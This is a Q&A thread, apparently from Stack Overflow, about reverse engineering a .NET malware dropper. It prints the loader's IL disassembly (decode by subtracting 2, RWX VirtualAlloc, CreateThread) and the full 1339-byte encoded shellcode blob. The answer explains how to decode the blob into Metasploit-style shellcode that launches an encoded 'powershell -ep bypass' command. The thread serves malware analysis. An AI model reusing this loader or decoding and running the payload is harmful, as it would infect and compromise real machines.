
I am currently reverse engineering a piece of .NET PE malware that runs shellcode from an embedded block of data: it copies the bytes into a buffer obtained from VirtualAlloc and starts a thread on that buffer with CreateThread.

This is the shellcodeRunner function as disassembled by monodis (I'm on Linux):

    .maxstack 6
    .locals init (
        unsigned int8[] V_0,    // decoded shellcode bytes (the embedded blob after the -2 loop below)
        int32   V_1,            // length of V_0
        native int  V_2,        // pointer returned by VirtualAlloc (RWX buffer)
        int32   V_3)            // loop index for the decode loop
    // Banner printed before anything else happens.
    IL_0000:  ldstr "[+] Running shellcode..."
    IL_0005:  call void class [mscorlib]System.Console::WriteLine(string)
    // Allocate a 1339-byte array and fill it from the static field in
    // <PrivateImplementationDetails> (this is the 1339-byte .data blob shown below).
    IL_000a:  ldc.i4 1339
    IL_000f:  newarr [mscorlib]System.Byte
    IL_0014:  dup 
    IL_0015:  ldtoken field valuetype '<PrivateImplementationDetails>'/'__StaticArrayInitTypeSize=1339' '<PrivateImplementationDetails>'::34D84C3D147ABF5A05B8FF8851822AACADD1A91EBDE633F0C7C82779CCC23977
    IL_001a:  call void class [mscorlib]System.Runtime.CompilerServices.RuntimeHelpers::InitializeArray(class [mscorlib]System.Array, valuetype [mscorlib]System.RuntimeFieldHandle)
    IL_001f:  stloc.0 
    // Decode loop: for (V_3 = 0; V_3 < V_0.Length; V_3++) V_0[V_3] = (byte)((V_0[V_3] - 2) & 0xFF);
    // i.e. every byte of the embedded blob is decremented by 2 (mod 256) in place.
    // The bytes in the .data section are therefore the ENCODED form; the
    // executable shellcode only exists after this loop has run.
    IL_0020:  ldc.i4.0 
    IL_0021:  stloc.3 
    IL_0022:  br.s IL_0037

    IL_0024:  ldloc.0 
    IL_0025:  ldloc.3 
    IL_0026:  ldloc.0 
    IL_0027:  ldloc.3 
    IL_0028:  ldelem.u1 
    IL_0029:  ldc.i4.2 
    IL_002a:  sub 
    IL_002b:  ldc.i4 255
    IL_0030:  and 
    IL_0031:  conv.u1 
    IL_0032:  stelem.i1 
    IL_0033:  ldloc.3 
    IL_0034:  ldc.i4.1 
    IL_0035:  add 
    IL_0036:  stloc.3 
    IL_0037:  ldloc.3 
    IL_0038:  ldloc.0 
    IL_0039:  ldlen 
    IL_003a:  conv.i4 
    IL_003b:  blt.s IL_0024

    // V_1 = V_0.Length
    IL_003d:  ldloc.0 
    IL_003e:  ldlen 
    IL_003f:  conv.i4 
    IL_0040:  stloc.1 
    // V_2 = VirtualAlloc(NULL, V_1, 0x3000 /* MEM_COMMIT | MEM_RESERVE */, 0x40 /* PAGE_EXECUTE_READWRITE */);
    // A fresh RWX allocation of exactly shellcode size is the classic
    // in-process shellcode-loader pattern and a good detection/hunting indicator.
    IL_0041:  ldsfld native int [mscorlib]System.IntPtr::Zero
    IL_0046:  ldloc.1 
    IL_0047:  ldc.i4 12288
    IL_004c:  ldc.i4.s 0x40
    IL_004e:  call native int class dropper.Program::VirtualAlloc(native int, int32, unsigned int32, unsigned int32)
    IL_0053:  stloc.2 
    // Marshal.Copy(V_0, 0, V_2, V_1): copy the decoded bytes into the RWX buffer.
    IL_0054:  ldloc.0 
    IL_0055:  ldc.i4.0 
    IL_0056:  ldloc.2 
    IL_0057:  ldloc.1 
    IL_0058:  call void class [mscorlib]System.Runtime.InteropServices.Marshal::Copy(unsigned int8[], int32, native int, int32)
    // CreateThread(NULL, 0, V_2 /* lpStartAddress = the buffer itself */, NULL, 0, NULL);
    // The shellcode is executed as native x86-64 code by a new thread whose
    // entry point is the buffer, so it is NOT CIL and the JIT never sees it.
    IL_005d:  ldsfld native int [mscorlib]System.IntPtr::Zero
    IL_0062:  ldc.i4.0 
    IL_0063:  ldloc.2 
    IL_0064:  ldsfld native int [mscorlib]System.IntPtr::Zero
    IL_0069:  ldc.i4.0 
    IL_006a:  ldc.i4.0 
    IL_006b:  call native int class dropper.Program::CreateThread(native int, unsigned int32, native int, native int, unsigned int32, unsigned int32)
    // WaitForSingleObject(hThread, -1 /* INFINITE */); return value discarded.
    IL_0070:  ldc.i4.m1 
    IL_0071:  call int32 class dropper.Program::WaitForSingleObject(native int, int32)
    IL_0076:  pop 
    IL_0077:  ret 
    } // end of method Program::shellcodeRunner

And this is the data blob that shellcodeRunner loads into its byte array (the `ldtoken` at IL_0015 references a 1339-byte static field, matching the `size: 1339` below). Note that these are the bytes *before* the decode loop runs: the loop subtracts 2 from every byte, so the actual shellcode is this blob with each byte decremented by 2 (mod 256).

.data D_000032e4 = bytearray (
     FE 4A 85 E6 F2 EA C2 02 02 02 43 53 43 52 54 53
     58 4A 33 D4 67 4A 8D 54 62 4A 8D 54 1A 4A 8D 54
     22 4A 8D 74 52 4A 11 B9 4C 4C 4F 33 CB 4A 33 C2
     AE 3E 63 7E 04 2E 22 43 C3 CB 0F 43 03 C3 E4 EF
     54 43 53 4A 8D 54 22 8D 44 3E 4A 03 D2 8D 82 8A
     02 02 02 4A 87 C2 76 69 4A 03 D2 52 8D 4A 1A 46
     8D 42 22 4B 03 D2 E5 58 4A 01 CB 43 8D 36 8A 4A
     03 D8 4F 33 CB 4A 33 C2 AE 43 C3 CB 0F 43 03 C3
     3A E2 77 F3 4E 05 4E 26 0A 47 3B D3 77 DA 5A 46
     8D 42 26 4B 03 D2 68 43 8D 0E 4A 46 8D 42 1E 4B
     03 D2 43 8D 06 8A 4A 03 D2 43 5A 43 5A 60 5B 5C
     43 5A 43 5B 43 5C 4A 85 EE 22 43 54 01 E2 5A 43
     5B 5C 4A 8D 14 EB 59 01 01 01 5F 4A BC 03 02 02
     02 02 02 02 02 4A 8F 8F 03 03 02 02 43 BC 33 8D
     71 89 01 D7 BD E2 1F 2C 0C 43 BC A8 97 BF 9F 01
     D7 4A 85 C6 2A 3E 08 7E 0C 82 FD E2 77 07 BD 49
     15 74 71 6C 02 5B 43 8B DC 01 D7 72 71 79 67 74
     75 6A 67 6E 6E 30 67 7A 67 22 2F 67 72 22 64 7B
     72 63 75 75 22 2F 67 70 65 22 4C 43 44 35 43 49
     4F 43 4B 43 43 3B 43 45 43 43 59 79 44 56 43 4A
     6D 43 65 79 44 32 43 49 57 43 64 53 43 77 43 47
     36 43 5C 53 44 32 43 45 36 43 58 79 44 6E 43 49
     4B 43 53 79 44 75 43 49 6D 43 5C 53 44 77 43 4A
     53 43 5A 53 43 38 43 46 71 43 64 69 44 6E 43 4A
     65 43 4D 43 43 72 43 46 75 43 4B 43 43 6D 43 4A
     53 43 5B 53 44 7B 43 49 65 43 5C 53 44 32 43 4A
     57 43 65 69 44 75 43 45 43 43 52 53 43 69 43 45
     65 43 63 43 44 32 43 4A 53 43 65 43 44 7C 43 46
     71 43 4E 79 43 78 43 49 69 43 5C 53 44 7B 43 49
     47 43 64 69 44 7C 43 49 3A 43 64 53 44 35 43 49
     47 43 65 69 44 6E 43 45 36 43 64 69 44 75 43 45
     3A 43 64 43 44 7C 43 49 53 43 63 79 44 6A 43 49
     5B 43 63 69 43 36 43 49 5B 43 63 69 44 6A 43 49
     5B 43 4F 69 43 7C 43 46 6D 43 51 43 44 6F 43 4A
     57 43 64 43 44 7C 43 49 53 43 4E 79 44 6E 43 4A
     5B 43 63 53 44 75 43 45 36 43 66 43 44 36 43 4A
     53 43 4C 79 43 39 43 45 53 43 65 43 44 33 43 49
     4B 43 64 43 44 72 43 4A 4F 43 63 43 44 6E 43 49
     53 43 55 43 44 6A 43 4A 4F 43 63 43 43 69 43 46
     32 43 4B 43 43 70 43 47 57 43 54 69 43 33 43 46
     6D 43 53 69 43 37 43 47 57 43 51 53 44 48 43 46
     47 43 4F 43 43 7A 43 47 5B 43 54 53 44 47 43 46
     4B 43 4F 69 43 7A 43 46 57 43 4F 43 44 47 43 46
     4F 43 51 43 43 7C 43 46 4B 43 53 53 43 7A 43 46
     4F 43 50 53 44 46 43 47 5B 43 4F 69 43 79 43 46
     4B 43 53 53 43 32 43 47 5B 43 50 79 43 34 43 46
     53 43 53 69 43 7A 43 47 5B 43 50 53 44 44 43 46
     53 43 53 79 44 44 43 46 57 43 53 79 44 45 43 47
     57 43 50 69 43 34 43 46 65 43 53 69 43 79 43 46
     47 43 50 43 44 45 43 46 47 43 53 69 44 48 43 46
     57 43 4C 79 43 39 43 45 43 43 4C 43 44 49 43 49
     6D 43 64 43 44 6E 43 47 69 43 5B 53 44 7C 43 49
     69 43 4B 43 43 3B 43 45 43 43 54 79 44 6E 43 4A
     53 43 4E 53 44 49 43 49 6D 43 64 43 44 6E 43 47
     69 43 5B 53 44 7C 43 49 69 43 4B 43 43 76 43 47
     6D 43 64 69 44 79 43 4A 57 43 66 43 44 56 43 4A
     53 43 65 69 44 6E 43 49 47 43 64 53 43 69 43 45
     69 43 4C 43 44 35 43 49 4F 43 4E 69 44 52 43 4A
     43 43 5C 53 44 77 43 48 4B 43 5C 53 44 6A 43 49
     53 43 4D 43 43 6D 43 4A 53 43 5B 53 44 7B 43 49
     65 43 5C 53 44 32 43 4A 57 43 65 69 44 75 43 45
     6D 43 4D 53 43 39 43 45 43 43 55 53 44 6F 43 45
     43 43 4D 43 43 6D 43 47 5B 43 63 53 44 75 43 49
     57 43 55 43 44 6A 43 4A 4F 43 63 43 43 77 43 47
     69 43 5B 53 44 7C 43 49 69 43 4B 43 43 76 43 49
     57 43 65 53 43 69 43 45 53 43 65 43 44 33 43 49
     4B 43 64 43 44 72 43 4A 4F 43 63 43 44 6E 43 49
     53 43 55 43 44 6A 43 4A 4F 43 63 43 43 72 43 45
     43 43 67 79 44 4C 43 47 57 43 59 43 43 71 43 45
     53 43 66 79 44 6C 43 45 36 43 54 43 44 78 43 4A
     65 43 64 69 44 75 43 49 3A 43 5B 53 44 6D 43 48
     4F 43 66 43 44 7B 43 49 6D 43 64 69 44 70 43 45
     69 43 4C 43 44 32 43 49 47 43 65 69 44 70 43 49
     57 43 66 43 44 33 43 4A 4B 43 64 43 43 72 43 45
     6D 43 68 53 43 69 43 47 57 43 64 43 44 7C 43 49
     57 43 4B 43 44 39 43 48 65 43 65 69 44 72 43 4A
     53 43 5C 53 43 76 43 47 69 43 64 79 44 7C 43 4A
     53 43 4B 43 44 64 43 45 32 43 5A 53 43 69 43 47
     4F 43 64 79 44 33 43 49 79 43 5C 43 43 69 43 49
     36 43 64 79 44 32 43 45 43 43 5B 79 44 78 43 49
     36 43 64 69 44 6E 43 49 4F 43 66 43 43 69 43 4A
     65 43 63 53 44 32 43 49 69 43 4B 43 43 6D 43 4A
     53 43 5B 53 44 7B 43 49 65 43 5C 53 44 32 43 4A
     57 43 65 69 44 75 43 4A 32 43 02) // size: 1339

What tool could I use to disassemble the instructions contained in the data? Running monodis on the data alone does not work, as it has no PE/metadata header of its own. Is there any 'force' parameter to monodis that allows it to still disassemble the data?

Any help on this matter would be much appreciated.

    _"What tool could I use to disassemble the instructions contained in the dat"_ - Ghidra? IDA Pro? [`edit.com`](https://en.wikipedia.org/wiki/MS-DOS_Editor)? – Dai Oct 16 '22 at 19:24
  • @Dai, I've run this through Ghidra but it does not seem to correctly disassemble this code as it is IL. Monodis however does, my question was if it was possible to have monodis disassemble the function contained at D_000032e4. When I try to run monodis with that data as input, I get a filetype-not-recognised error, presumably because the data only contains a function and not an entire executable. If monodis is not the solution, what other IL disassembler can I use for this? – MidasVanVeen Oct 16 '22 at 19:40
    The binary data in `.data D_000032e4` is not IL: you can tell because the program doesn't use the JIT on it, but loads it into an arbitrary location in memory (the `VirtualAlloc` call at IL_004e passes `0x40` = `PAGE_EXECUTE_READWRITE`, so the pages really are write+execute, a dangerous combination...) and passes it as the start address to the Win32 (i.e. native) `CreateThread` function. So it is native machine code, not CIL. – Dai Oct 16 '22 at 19:43
  • Oh thank you for clarifying, I was able to disassemble it in Ghidra by just selecting it and right-clicking :) – MidasVanVeen Oct 16 '22 at 19:49



I was able to disassemble the data portion by selecting it and right-clicking > Disassemble in Ghidra (with the x86-64 language selected, since this is native code, not CIL). Thanks to Dai for the insight.

One important caveat: the bytes in the `.data` block are the *encoded* form. Before copying them into the RWX buffer, `shellcodeRunner` subtracts 2 from every byte (the `ldelem.u1 / ldc.i4.2 / sub / ldc.i4 255 / and` loop at IL_0024–IL_003b), so disassembling the raw `.data` bytes produces garbage. Apply the same transform first, e.g. `bytes((b - 2) & 0xFF for b in blob)` in Python, and disassemble the result. After decoding, the blob starts with `FC 48 83 E4 F0 E8 C0 00 00 00` (`cld; and rsp, -16; call ...`), the usual prologue of Metasploit-style x64 Windows shellcode, and the tail decodes to the string `powershell.exe -ep bypass -enc ` followed by a base64 blob — presumably the command line the shellcode hands to WinExec/CreateProcess. Base64-decoding that remainder as UTF-16LE (the `-EncodedCommand` format) recovers the PowerShell stage.